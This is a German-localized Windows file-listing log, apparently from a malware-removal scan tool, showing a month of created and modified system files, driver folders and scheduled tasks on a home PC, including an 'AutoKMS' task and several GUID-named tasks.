2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-21 21:01 - 01992350 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-21 20:55 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00023140 _____ C:\WINDOWS\System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-21 20:55 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-21 21:01 - 2017-03-20 06:41 - 00877602 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-21 21:01 - 2017-03-20 06:41 - 00184122 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-21 20:56 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-21 20:56 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-21 20:55 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:55 - 2017-02-05 21:38 - 00014132 _____ C:\bdlog.txt
2017-05-21 20:55 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-21 18:01 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-21 12:27 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-20 14:33 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-17 21:22 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
